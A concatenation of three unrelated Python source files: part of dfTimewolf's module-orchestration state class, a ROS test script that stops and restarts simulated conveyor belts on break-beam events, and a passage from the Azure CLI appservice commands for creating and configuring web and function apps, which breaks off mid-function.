with self._state_lock:
containers = self.store.get(container_class.CONTAINER_TYPE, [])
if pop:
self.store[container_class.CONTAINER_TYPE] = []
return containers
def _SetupModuleThread(self, module_definition):
"""Calls the module's SetUp() function and sets a threading event for it.
Callback for _InvokeModulesInThreads.
Args:
module_definition (dict[str, str]): recipe module definition.
"""
module_name = module_definition['name']
runtime_name = module_definition.get('runtime_name', module_name)
logger.info('Setting up module: {0:s}'.format(runtime_name))
new_args = utils.ImportArgsFromDict(
module_definition['args'], self.command_line_options, self.config)
module = self._module_pool[runtime_name]
try:
module.SetUp(**new_args)
except errors.DFTimewolfError as exception:
msg = "A critical error occurred in module {0:s}, aborting execution."
logger.critical(msg.format(module.name))
except Exception as exception: # pylint: disable=broad-except
msg = 'An unknown error occurred in module {0:s}: {1!s}'.format(
module.name, exception)
logger.critical(msg)
# We're catching any exception that is not a DFTimewolfError, so we want
# to generate an error for further reporting.
error = errors.DFTimewolfError(
message=msg, name='state', stacktrace=traceback.format_exc(),
critical=True, unexpected=True)
self.AddError(error)
self._threading_event_per_module[runtime_name] = threading.Event()
self.CleanUp()
def SetupModules(self):
"""Performs setup tasks for each module in the module pool.
Threads declared modules' SetUp() functions. Takes CLI arguments into
account when replacing recipe parameters for each module.
"""
# Note that vars() copies the values of argparse.Namespace to a dict.
self._InvokeModulesInThreads(self._SetupModuleThread)
def _RunModuleThread(self, module_definition):
"""Runs the module's Process() function.
Callback for _InvokeModulesInThreads.
Waits for any blockers to have finished before running Process(), then
sets an Event flag declaring the module has completed.
Args:
module_definition (dict): module definition.
"""
module_name = module_definition['name']
runtime_name = module_definition.get('runtime_name', module_name)
for dependency in module_definition['wants']:
self._threading_event_per_module[dependency].wait()
module = self._module_pool[runtime_name]
# Abort processing if a module has had critical failures before.
if self._abort_execution:
logger.critical(
'Aborting execution of {0:s} due to previous errors'.format(
module.name))
self._threading_event_per_module[runtime_name].set()
self.CleanUp()
return
logger.info('Running module: {0:s}'.format(runtime_name))
try:
module.Process()
except errors.DFTimewolfError as exception:
logger.critical(
"Critical error in module {0:s}, aborting execution".format(
module.name))
except Exception as exception: # pylint: disable=broad-except
msg = 'An unknown error occurred in module {0:s}: {1!s}'.format(
module.name, exception)
logger.critical(msg)
# We're catching any exception that is not a DFTimewolfError, so we want
# to generate an error for further reporting.
error = errors.DFTimewolfError(
message=msg, name='state', stacktrace=traceback.format_exc(),
critical=True, unexpected=True)
self.AddError(error)
logger.info('Module {0:s} finished execution'.format(runtime_name))
self._threading_event_per_module[runtime_name].set()
self.CleanUp()
def RunPreflights(self):
"""Runs preflight modules."""
for preflight_definition in self.recipe.get('preflights', []):
preflight_name = preflight_definition['name']
runtime_name = preflight_definition.get('runtime_name', preflight_name)
args = preflight_definition.get('args', {})
new_args = utils.ImportArgsFromDict(
args, self.command_line_options, self.config)
preflight = self._module_pool[runtime_name]
try:
preflight.SetUp(**new_args)
preflight.Process()
finally:
self.CheckErrors(is_global=True)
def CleanUpPreflights(self):
"""Executes any cleanup actions defined in preflight modules."""
for preflight_definition in self.recipe.get('preflights', []):
preflight_name = preflight_definition['name']
runtime_name = preflight_definition.get('runtime_name', preflight_name)
preflight = self._module_pool[runtime_name]
try:
preflight.CleanUp()
finally:
self.CheckErrors(is_global=True)
def InstantiateModule(self, module_name):
"""Instantiates an arbitrary dfTimewolf module.
Args:
module_name (str): The name of the module to instantiate.
Returns:
BaseModule: An instance of a dftimewolf Module, which is a subclass of
BaseModule.
"""
module_class = modules_manager.ModulesManager.GetModuleByName(module_name)
return module_class(self)
def RunModules(self):
"""Performs the actual processing for each module in the module pool."""
self._InvokeModulesInThreads(self._RunModuleThread)
def RegisterStreamingCallback(self, target, container_type):
"""Registers a callback for a type of container.
The function to be registered should a single parameter of type
interface.AttributeContainer.
Args:
target (function): function to be called.
container_type (type[interface.AttributeContainer]): container type on
which the callback will be called.
"""
if container_type not in self.streaming_callbacks:
self.streaming_callbacks[container_type] = []
self.streaming_callbacks[container_type].append(target)
def StreamContainer(self, container):
"""Streams a container to the callbacks that are registered to handle it.
Args:
container (interface.AttributeContainer): container instance that will be
streamed to any registered callbacks.
"""
for callback in self.streaming_callbacks.get(type(container), []):
callback(container)
def AddError(self, error):
"""Adds an error to the state.
Args:
error (errors.DFTimewolfError): The dfTimewolf error to add.
"""
if error.critical:
self._abort_execution = True
self.errors.append(error)
def CleanUp(self):
"""Cleans up after running a module.
The state's output becomes the input for the next stage. Any errors are
moved to the global_errors attribute so that they can be reported at a
later stage.
"""
# Move any existing errors to global errors
self.global_errors.extend(self.errors)
self.errors = []
def CheckErrors(self, is_global=False):
"""Checks for errors and exits if any of them are critical.
Args:
is_global (Optional[bool]): True if the global_errors attribute should
be checked. False if the error attribute should be checked.
"""
error_objects = self.global_errors if is_global else self.errors
critical_errors = False
if error_objects:
logger.error('dfTimewolf encountered one or more errors:')
for index, error in enumerate(error_objects):
logger.error('{0:d}: error from {1:s}: {2:s}'.format(
index+1, error.name, error.message))
if error.stacktrace:
for line in error.stacktrace.split('\n'):
logger.error(line)
if error.critical:
critical_errors = True
if any(error.unexpected for error in error_objects):
logger.critical('One or more unexpected errors occurred.')
logger.critical(
'Please consider opening an issue: {0:s}'.format(NEW_ISSUE_URL))
if critical_errors:
logger.critical('Critical error found. Aborting.')
sys.exit(1)
|
test_conveyor_beam.py
|
#!/usr/bin/env python
"""
Script to test that the input of break beams are read correctly, and the conveyor controls are functionining correctly.
This program will stop the respective conveyors for 5 seconds before resuming whenever its respective break beam detects sth.
Author: James Lin
Date: 29/07/2020
"""
import rospy
import argparse
import threading
import time
from ur5_t2_4230.srv import (
ConveyorBeltControl,
ConveyorBeltControlRequest,
ConveyorBeltControlResponse
)
from std_msgs.msg import Bool, Empty
from ur5_t2_4230.msg import Proximity, ConveyorBeltState
SLEEP_RATE = 3 # Hz
CONVEYOR_COOLDOWN = 5 # 5 seconds
CONVEYOR_POWER = 25.00 # 25% power
class TestConveyorBeam():
def __init__(self, *args, **kwargs):
rospy.loginfo("Initialising TestConveyorBeam Node")
self._rate = rospy.Rate(SLEEP_RATE)
# Initialise Subscribers
self._bb_in_sub = rospy.Subscriber("/break_beam_in_sensor_change", Bool, self.handleProximityChange, ('in'))
self._bb_out_sub = rospy.Subscriber("/break_beam_out_sensor_change", Bool, self.handleProximityChange, ('out'))
# Initialise Publishers
self._spawn_container_pub = rospy.Publisher("/spawner/create_container", Empty, queue_size=1)
self._spawn_set_auto_pub = rospy.Publisher("/spawner/set_auto", Bool, queue_size=1)
# Initialise Client Server Handlers
rospy.loginfo("Waiting to connect with conveyor belts service...")
rospy.wait_for_service("/ur5_t2_4230/conveyor/control/in")
rospy.wait_for_service("/ur5_t2_4230/conveyor/control/out")
rospy.loginfo("Successfully connected to conveyor belts!")
self._cc_in_client = rospy.ServiceProxy("/ur5_t2_4230/conveyor/control/in", ConveyorBeltControl)
self._cc_out_client = rospy.ServiceProxy("/ur5_t2_4230/conveyor/control/out", ConveyorBeltControl)
return
def handleProximityChange(self, msg, id):
rospy.logdebug('[handleProximityChange - ' + id + '] msg: ' + str(msg))
# Incoming Objects
if not msg.data: return True
# Stop Conveyor
request = ConveyorBeltControlRequest(ConveyorBeltState(power=0.00))
if id == 'in':
# Pickable objects
# Stop Spawning Temporarily
self._spawn_set_auto_pub.publish(Bool(False))
client = self._cc_in_client
else:
# id == 'out'; Container Objects
client = self._cc_out_client
try:
response = client(request)
rospy.loginfo('Successfully stopped conveyor_belt_' + id)
self._cooldown_thread = threading.Thread(name='CooldownThread_' + id, target=self.cooldownThread, args=(client, id))
self._cooldown_thread.start()
except rospy.ServiceException as exc:
rospy.logerr("Service did not process request: " + str(exc))
return False
return True
def cooldownThread(self, client, id):
# Start Conveyor again after cooldown
rospy.logdebug('[CooldownThread_]' + id)
duration = 0
while duration < CONVEYOR_COOLDOWN:
rospy.logdebug('[CooldownThread_' + id + ']: ' + str(duration))
duration += 1
time.sleep(1)
# Start Conveyor again
if id == 'in':
# Resume spawning objects
self._spawn_set_auto_pub.publish(Bool(True))
else:
# Spawn the next container
self._spawn_container_pub.publish(Empty())
request = ConveyorBeltControlRequest(ConveyorBeltState(power=CONVEYOR_POWER))
try:
response = client(request)
rospy.loginfo('Successfully started conveyor_belt_' + id)
except rospy.ServiceException as exc:
rospy.logerr("Service did not process request: " + str(exc))
return
if __name__ == "__main__":
rospy.init_node('test_conveyor_beam')
TestConveyorBeam()
rospy.spin()
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import threading
import time
import ast
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse # pylint: disable=import-error
from binascii import hexlify
from os import urandom
import datetime
import json
import ssl
import sys
import uuid
from six.moves.urllib.request import urlopen # pylint: disable=import-error, ungrouped-imports
import OpenSSL.crypto
from fabric import Connection
from knack.prompting import prompt_pass, NoTTYException
from knack.util import CLIError
from knack.log import get_logger
from msrestazure.azure_exceptions import CloudError
from msrestazure.tools import is_valid_resource_id, parse_resource_id
from azure.mgmt.storage import StorageManagementClient
from azure.mgmt.web.models import (Site, SiteConfig, User, AppServicePlan, SiteConfigResource,
SkuDescription, SslState, HostNameBinding, NameValuePair,
BackupRequest, DatabaseBackupSetting, BackupSchedule,
RestoreRequest, FrequencyUnit, Certificate, HostNameSslState,
HybridConnection, RampUpRule, UnauthenticatedClientAction,
ManagedServiceIdentity, DeletedAppRestoreRequest,
DefaultErrorResponseException, SnapshotRestoreRequest,
SnapshotRecoverySource, SwiftVirtualNetwork, HostingEnvironmentProfile)
from azure.mgmt.applicationinsights import ApplicationInsightsManagementClient
from azure.mgmt.relay.models import AccessRights
from azure.cli.command_modules.relay._client_factory import hycos_mgmt_client_factory, namespaces_mgmt_client_factory
from azure.storage.blob import BlockBlobService, BlobPermissions
from azure.cli.command_modules.network._client_factory import network_client_factory
from azure.mgmt.network.models import Delegation
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, open_page_in_browser, get_json_object, \
ConfiguredDefaultSetter, sdk_no_wait
from azure.cli.core.commands.client_factory import UA_AGENT
from .tunnel import TunnelServer
from .vsts_cd_provider import VstsContinuousDeliveryProvider
from ._params import AUTH_TYPES, MULTI_CONTAINER_TYPES, LINUX_RUNTIMES, WINDOWS_RUNTIMES
from ._client_factory import web_client_factory, ex_handler_factory
from ._appservice_utils import _generic_site_operation
from .utils import _normalize_sku, get_sku_name
from ._create_util import (zip_contents_from_dir, get_runtime_version_details, create_resource_group, get_app_details,
should_create_new_rg, set_location, does_app_already_exist, get_profile_username,
get_plan_to_use, get_lang_from_content, get_rg_to_use, get_sku_to_use,
detect_os_form_src)
from ._constants import (RUNTIME_TO_DEFAULT_VERSION, NODE_VERSION_DEFAULT_FUNCTIONAPP,
RUNTIME_TO_IMAGE_FUNCTIONAPP, NODE_VERSION_DEFAULT)
logger = get_logger(__name__)
# pylint:disable=no-member,too-many-lines,too-many-locals
# region "Common routines shared with quick-start extensions."
# Please maintain compatibility in both interfaces and functionalities"
def create_webapp(cmd, resource_group_name, name, plan, runtime=None, startup_file=None, # pylint: disable=too-many-statements,too-many-branches
deployment_container_image_name=None, deployment_source_url=None, deployment_source_branch='master',
deployment_local_git=None, docker_registry_server_password=None, docker_registry_server_user=None,
multicontainer_config_type=None, multicontainer_config_file=None, tags=None,
using_webapp_up=False, language=None):
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
client = web_client_factory(cmd.cli_ctx)
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist".format(plan))
is_linux = plan_info.reserved
node_default_version = NODE_VERSION_DEFAULT
location = plan_info.location
site_config = SiteConfig(app_settings=[])
if isinstance(plan_info.sku, SkuDescription) and plan_info.sku.name.upper() not in ['F1', 'FREE', 'SHARED', 'D1',
'B1', 'B2', 'B3', 'BASIC']:
site_config.always_on = True
webapp_def = Site(location=location, site_config=site_config, server_farm_id=plan_info.id, tags=tags)
helper = _StackRuntimeHelper(client, linux=is_linux)
if is_linux:
if not validate_container_app_create_options(runtime, deployment_container_image_name,
multicontainer_config_type, multicontainer_config_file):
raise CLIError("usage error: --runtime | --deployment-container-image-name |"
" --multicontainer-config-type TYPE --multicontainer-config-file FILE")
if startup_file:
site_config.app_command_line = startup_file
if runtime:
site_config.linux_fx_version = runtime
match = helper.resolve(runtime)
if not match:
raise CLIError("Linux Runtime '{}' is not supported."
"Please invoke 'list-runtimes' to cross check".format(runtime))
elif deployment_container_image_name:
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
site_config.app_settings.append(NameValuePair(name="WEBSITES_ENABLE_APP_SERVICE_STORAGE",
value="false"))
elif multicontainer_config_type and multicontainer_config_file:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
site_config.linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
elif plan_info.is_xenon: # windows container webapp
site_config.windows_fx_version = _format_fx_version(deployment_container_image_name)
elif runtime: # windows webapp with runtime specified
if any([startup_file, deployment_container_image_name, multicontainer_config_file, multicontainer_config_type]):
raise CLIError("usage error: --startup-file or --deployment-container-image-name or "
"--multicontainer-config-type and --multicontainer-config-file is "
"only appliable on linux webapp")
match = helper.resolve(runtime)
if not match:
raise CLIError("Runtime '{}' is not supported. Please invoke 'list-runtimes' to cross check".format(runtime)) # pylint: disable=line-too-long
match['setter'](match, site_config)
# Be consistent with portal: any windows webapp should have this even it doesn't have node in the stack
if not match['displayName'].startswith('node'):
site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
value=node_default_version))
else: # windows webapp without runtime specified
site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
value=node_default_version))
if site_config.app_settings:
for setting in site_config.app_settings:
logger.info('Will set appsetting %s', setting)
if using_webapp_up: # when the routine is invoked as a help method for webapp up
logger.info("will set appsetting for enabling build")
site_config.app_settings.append(NameValuePair(name="SCM_DO_BUILD_DURING_DEPLOYMENT", value=True))
if language is not None and language.lower() == 'dotnetcore':
site_config.app_settings.append(NameValuePair(name='ANCM_ADDITIONAL_ERROR_PAGE_LINK',
value='https://{}.scm.azurewebsites.net/detectors'.format(name)))
poller = client.web_apps.create_or_update(resource_group_name, name, webapp_def)
webapp = LongRunningOperation(cmd.cli_ctx)(poller)
# Ensure SCC operations follow right after the 'create', no precedent appsetting update commands
_set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name)
if deployment_container_image_name:
update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password=docker_registry_server_password)
return webapp
def validate_container_app_create_options(runtime=None, deployment_container_image_name=None,
multicontainer_config_type=None, multicontainer_config_file=None):
if bool(multicontainer_config_type) != bool(multicontainer_config_file):
return False
opts = [runtime, deployment_container_image_name, multicontainer_config_type]
return len([x for x in opts if x]) == 1 # you can only specify one out the combinations
def parse_docker_image_name(deployment_container_image_name):
if not deployment_container_image_name:
return None
slash_ix = deployment_container_image_name.rfind('/')
docker_registry_server_url = deployment_container_image_name[0:slash_ix]
if slash_ix == -1 or ("." not in docker_registry_server_url and ":" not in docker_registry_server_url):
return None
return docker_registry_server_url
def update_app_settings(cmd, resource_group_name, name, settings=None, slot=None, slot_settings=None):
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_application_settings', slot)
result, slot_result = {}, {}
# pylint: disable=too-many-nested-blocks
for src, dest in [(settings, result), (slot_settings, slot_result)]:
for s in src:
try:
temp = shell_safe_json_parse(s)
if isinstance(temp, list): # a bit messy, but we'd like accept the output of the "list" command
for t in temp:
if t.get('slotSetting', True):
slot_result[t['name']] = t['value']
# Mark each setting as the slot setting
else:
result[t['name']] = t['value']
else:
dest.update(temp)
except CLIError:
setting_name, value = s.split('=', 1)
dest[setting_name] = value
result.update(slot_result)
for setting_name, value in result.items():
app_settings.properties[setting_name] = value
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings.properties, slot, client)
app_settings_slot_cfg_names = []
if slot_result:
new_slot_setting_names = slot_result.keys()
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.app_setting_names = slot_cfg_names.app_setting_names or []
slot_cfg_names.app_setting_names += new_slot_setting_names
app_settings_slot_cfg_names = slot_cfg_names.app_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _build_app_settings_output(result.properties, app_settings_slot_cfg_names)
def add_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type, account_name,
share_name, access_key, mount_path=None, slot=None, slot_setting=False):
from azure.mgmt.web.models import AzureStorageInfoValue
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
if custom_id in azure_storage_accounts.properties:
raise CLIError("Site already configured with an Azure storage account with the id '{}'. "
"Use 'az webapp config storage-account update' to update an existing "
"Azure storage account configuration.".format(custom_id))
azure_storage_accounts.properties[custom_id] = AzureStorageInfoValue(type=storage_type, account_name=account_name,
share_name=share_name, access_key=access_key,
mount_path=mount_path)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def update_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type=None, account_name=None,
share_name=None, access_key=None, mount_path=None, slot=None, slot_setting=False):
from azure.mgmt.web.models import AzureStorageInfoValue
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
existing_account_config = azure_storage_accounts.properties.pop(custom_id, None)
if not existing_account_config:
raise CLIError("No Azure storage account configuration found with the id '{}'. "
"Use 'az webapp config storage-account add' to add a new "
"Azure storage account configuration.".format(custom_id))
new_account_config = AzureStorageInfoValue(
type=storage_type or existing_account_config.type,
account_name=account_name or existing_account_config.account_name,
share_name=share_name or existing_account_config.share_name,
access_key=access_key or existing_account_config.access_key,
mount_path=mount_path or existing_account_config.mount_path
)
azure_storage_accounts.properties[custom_id] = new_account_config
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def enable_zip_deploy_functionapp(cmd, resource_group_name, name, src, build_remote=False, timeout=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
app = client.web_apps.get(resource_group_name, name)
parse_plan_id = parse_resource_id(app.server_farm_id)
plan_info = None
retry_delay = 10 # seconds
# We need to retry getting the plan because sometimes if the plan is created as part of function app,
# it can take a couple of tries before it gets the plan
for _ in range(5):
plan_info = client.app_service_plans.get(parse_plan_id['resource_group'],
parse_plan_id['name'])
if plan_info is not None:
break
time.sleep(retry_delay)
if build_remote and not app.reserved:
raise CLIError('Remote build is only available on Linux function apps')
is_consumption = is_plan_consumption(plan_info)
if (not build_remote) and is_consumption and app.reserved:
return upload_zip_to_storage(cmd, resource_group_name, name, src, slot)
if build_remote:
add_remote_build_app_settings(cmd, resource_group_name, name, slot)
else:
remove_remote_build_app_settings(cmd, resource_group_name, name, slot)
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout, slot)
def enable_zip_deploy_webapp(cmd, resource_group_name, name, src, timeout=None, slot=None):
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout=timeout, slot=slot)
def enable_zip_deploy(cmd, resource_group_name, name, src, timeout=None, slot=None):
logger.warning("Getting scm site credentials for zip deployment")
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
try:
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
except ValueError:
raise CLIError('Failed to fetch scm url for function app')
zip_url = scm_url + '/api/zipdeploy?isAsync=true'
deployment_status_url = scm_url + '/api/deployments/latest'
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers = authorization
headers['content-type'] = 'application/octet-stream'
headers['User-Agent'] = UA_AGENT
import requests
import os
from azure.cli.core.util import should_disable_connection_verify
# Read file content
with open(os.path.realpath(os.path.expanduser(src)), 'rb') as fs:
zip_content = fs.read()
logger.warning("Starting zip deployment. This operation can take a while to complete ...")
res = requests.post(zip_url, data=zip_content, headers=headers, verify=not should_disable_connection_verify())
logger.warning("Deployment endpoint responded with status code %d", res.status_code)
# check if there's an ongoing process
if res.status_code == 409:
raise CLIError("There may be an ongoing deployment or your app setting has WEBSITE_RUN_FROM_PACKAGE. "
"Please track your deployment in {} and ensure the WEBSITE_RUN_FROM_PACKAGE app setting "
"is removed.".format(deployment_status_url))
# check the status of async deployment
response = _check_zip_deployment_status(cmd, resource_group_name, name, deployment_status_url,
authorization, timeout)
return response
def add_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
enable_oryx_build = None
scm_do_build_during_deployment = None
website_run_from_package = None
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'ENABLE_ORYX_BUILD':
enable_oryx_build = value in ('true', '1')
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if keyval['name'] == 'WEBSITE_RUN_FROM_PACKAGE':
website_run_from_package = value
if not ((enable_oryx_build is True) and (scm_do_build_during_deployment is True)):
logger.warning("Setting ENABLE_ORYX_BUILD to true")
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to true")
update_app_settings(cmd, resource_group_name, name, [
"ENABLE_ORYX_BUILD=true",
"SCM_DO_BUILD_DURING_DEPLOYMENT=true"
], slot)
time.sleep(5)
if website_run_from_package is not None:
logger.warning("Removing WEBSITE_RUN_FROM_PACKAGE app setting")
delete_app_settings(cmd, resource_group_name, name, [
"WEBSITE_RUN_FROM_PACKAGE"
], slot)
time.sleep(5)
def remove_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
enable_oryx_build = None
scm_do_build_during_deployment = None
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'ENABLE_ORYX_BUILD':
enable_oryx_build = value in ('true', '1')
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if not ((enable_oryx_build is False) and (scm_do_build_during_deployment is False)):
logger.warning("Setting ENABLE_ORYX_BUILD to false")
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to false")
update_app_settings(cmd, resource_group_name, name, [
"ENABLE_ORYX_BUILD=false",
"SCM_DO_BUILD_DURING_DEPLOYMENT=false"
], slot)
time.sleep(5)
def upload_zip_to_storage(cmd, resource_group_name, name, src, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
storage_connection = None
for keyval in settings:
if keyval['name'] == 'AzureWebJobsStorage':
storage_connection = str(keyval['value'])
if storage_connection is None:
raise CLIError('Could not find a \'AzureWebJobsStorage\' application setting')
container_name = "function-releases"
blob_name = "{}-{}.zip".format(datetime.datetime.today().strftime('%Y%m%d%H%M%S'), str(uuid.uuid4()))
block_blob_service = BlockBlobService(connection_string=storage_connection)
if not block_blob_service.exists(container_name):
block_blob_service.create_container(container_name)
# https://gist.github.com/vladignatyev/06860ec2040cb497f0f3
def progress_callback(current, total):
total_length = 30
filled_length = int(round(total_length * current) / float(total))
percents = round(100.0 * current / float(total), 1)
progress_bar = '=' * filled_length + '-' * (total_length - filled_length)
progress_message = 'Uploading {} {}%'.format(progress_bar, percents)
cmd.cli_ctx.get_progress_controller().add(message=progress_message)
block_blob_service.create_blob_from_path(container_name, blob_name, src, validate_content=True,
progress_callback=progress_callback)
now = datetime.datetime.now()
blob_start = now - datetime.timedelta(minutes=10)
blob_end = now + datetime.timedelta(weeks=520)
blob_token = block_blob_service.generate_blob_shared_access_signature(container_name,
blob_name,
permission=BlobPermissions(read=True),
expiry=blob_end,
start=blob_start)
blob_uri = block_blob_service.make_blob_url(container_name, blob_name, sas_token=blob_token)
website_run_from_setting = "WEBSITE_RUN_FROM_PACKAGE={}".format(blob_uri)
update_app_settings(cmd, resource_group_name, name, settings=[website_run_from_setting])
client = web_client_factory(cmd.cli_ctx)
try:
logger.info('\nSyncing Triggers...')
if slot is not None:
client.web_apps.sync_function_triggers_slot(resource_group_name, name, slot)
else:
client.web_apps.sync_function_triggers(resource_group_name, name)
except CloudError as ce:
# This SDK function throws an error if Status Code is 200
if ce.status_code != 200:
raise ce
def _generic_settings_operation(cli_ctx, resource_group_name, name, operation_name,
setting_properties, slot=None, client=None):
client = client or web_client_factory(cli_ctx)
operation = getattr(client.web_apps, operation_name if slot is None else operation_name + '_slot')
if slot is None:
return operation(resource_group_name, name, str, setting_properties)
return operation(resource_group_name, name, slot, str, setting_properties)
def show_webapp(cmd, resource_group_name, name, slot=None, app_instance=None):
webapp = app_instance
if not app_instance: # when the routine is invoked as a help method, not through commands
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(name))
_rename_server_farm_props(webapp)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot)
return webapp
# for generic updater
def get_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def set_webapp(cmd, resource_group_name, name, slot=None, skip_dns_registration=None,
skip_custom_domain_verification=None, force_dns_registration=None, ttl_in_seconds=None, **kwargs):
instance = kwargs['parameters']
client = web_client_factory(cmd.cli_ctx)
updater = client.web_apps.create_or_update_slot if slot else client.web_apps.create_or_update
kwargs = dict(resource_group_name=resource_group_name, name=name, site_envelope=instance,
skip_dns_registration=skip_dns_registration,
skip_custom_domain_verification=skip_custom_domain_verification,
force_dns_registration=force_dns_registration,
ttl_in_seconds=ttl_in_seconds)
if slot:
kwargs['slot'] = slot
return updater(**kwargs)
def update_webapp(instance, client_affinity_enabled=None, https_only=None):
if 'function' in instance.kind:
raise CLIError("please use 'az functionapp update' to update this function app")
if client_affinity_enabled is not None:
instance.client_affinity_enabled = client_affinity_enabled == 'true'
if https_only is not None:
instance.https_only = https_only == 'true'
return instance
def update_functionapp(cmd, instance, plan=None):
client = web_client_factory(cmd.cli_ctx)
if plan is not None:
if is_valid_resource_id(plan):
dest_parse_result = parse_resource_id(plan)
dest_plan_info = client.app_service_plans.get(dest_parse_result['resource_group'],
dest_parse_result['name'])
else:
dest_plan_info = client.app_service_plans.get(instance.resource_group, plan)
if dest_plan_info is None:
raise CLIError("The plan '{}' doesn't exist".format(plan))
validate_plan_switch_compatibility(client, instance, dest_plan_info)
instance.server_farm_id = dest_plan_info.id
return instance
def validate_plan_switch_compatibility(client, src_functionapp_instance, dest_plan_instance):
general_switch_msg = 'Currently the switch is only allowed between a Consumption or an Elastic Premium plan.'
src_parse_result = parse_resource_id(src_functionapp_instance.server_farm_id)
src_plan_info = client.app_service_plans.get(src_parse_result['resource_group'],
src_parse_result['name'])
if src_plan_info is None:
raise CLIError('Could not determine the current plan of the functionapp')
if not (is_plan_consumption(src_plan_info) or is_plan_elastic_premium(src_plan_info)):
raise CLIError('Your functionapp is not using a Consumption or an Elastic Premium plan. ' + general_switch_msg)
if not (is_plan_consumption(dest_plan_instance) or is_plan_elastic_premium(dest_plan_instance)):
raise CLIError('You are trying to move to a plan that is not a Consumption or an Elastic Premium plan. ' +
general_switch_msg)
def set_functionapp(cmd, resource_group_name, name, **kwargs):
instance = kwargs['parameters']
if 'function' not in instance.kind:
raise CLIError('Not a function app to update')
client = web_client_factory(cmd.cli_ctx)
return client.web_apps.create_or_update(resource_group_name, name, site_envelope=instance)
def list_webapp(cmd, resource_group_name=None):
result = _list_app(cmd.cli_ctx, resource_group_name)
return [r for r in result if 'function' not in r.kind]
def list_deleted_webapp(cmd, resource_group_name=None, name=None, slot=None):
result = _list_deleted_app(cmd.cli_ctx, resource_group_name, name, slot)
return sorted(result, key=lambda site: site.deleted_site_id)
def restore_deleted_webapp(cmd, deleted_id, resource_group_name, name, slot=None, restore_content_only=None):
request = DeletedAppRestoreRequest(deleted_site_id=deleted_id, recover_configuration=not restore_content_only)
